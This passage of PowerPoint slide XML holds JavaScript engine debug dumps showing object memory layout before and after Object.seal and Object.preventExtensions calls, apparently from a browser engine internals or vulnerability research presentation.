                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b10    0x00000064    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b14    0x000001c0    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b18    0x0000000e    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b1c    0x0000002e    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>==== [DEBUG][AFTER][Object.seal(v12)] %DumpObjects(0, 11)</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>----- [ NUMBER_DICTIONARY_TYPE : 0x198 ] -----</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9af4    0x26540c19    MAP_TYPE    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9af8    0x000000c8    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9afc    0x00000020    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b00    0x00000000    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b04    0x00000040    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b08    0x00000002    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b0c    0x00000006    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b10    0x00000064    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b14    0x000001c0    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b18    0x0000000e    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9b1c    0x0000002e </a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="직사각형 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98612DA3-D334-4E07-A554-27C601F2F90A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9848956" y="1389401"/>
                <a:ext cx="1998497" cy="4893647"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>==== [DEBUG][BEFORE][Object.seal(o)]  %DumpObjects(0, 11)</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>----- [ FIXED_ARRAY_TYPE : 0x4c ] -----</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9d24    0x26540435    MAP_TYPE    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9d28    0x00000022    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9d2c    0x00000010    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9d30    0x00000000    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9d34    0x00000010    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9d38    0x00000064    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9d3c    0x00000000    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9d40    0x00008484    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9d44    0x00000180    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9d48    0x0000002e    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9d4c    0x00000030    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>==== [DEBUG][AFTER][Object.seal(o)]  %DumpObjects(0, 11)</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>----- [ NUMBER_DICTIONARY_TYPE : 0x198 ] -----</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9eec    0x26540c19    MAP_TYPE    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9ef0    0x000000c8    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9ef4    0x00000020    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9ef8    0x00000000    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9efc    0x00000040    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f00    0x00000002    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f04    0x00000006    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f08    0x00000064    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f0c    0x000001c0    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f10    0x0000000e    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f14    0x0000002e    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>==== [DEBUG][BEFORE][Object.preventExtensions(v12)]  %DumpObjects(0, 11)</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>----- [ NUMBER_DICTIONARY_TYPE : 0x198 ] -----</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9eec    0x26540c19    MAP_TYPE    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9ef0    0x000000c8    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9ef4    0x00000020    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9ef8    0x00000000    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9efc    0x00000040    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f00    0x00000002    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f04    0x00000006    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f08    0x00000064    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f0c    0x000001c0    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f10    0x0000000e    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9f14    0x0000002e    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>==== [DEBUG][AFTER][Object.preventExtensions(v12)] %DumpObjects(0, 11)</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>----- [ NUMBER_DICTIONARY_TYPE : 0x198 ] -----</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9eec    0x26540c19    MAP_TYPE    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9ef0    0x000000c8    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
                  <a:t>0x3a1c9ef4    0x00000020    </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="ko-KR" altLang="en-US" sz="400">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                    <a:ea typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
                  </a:rPr>
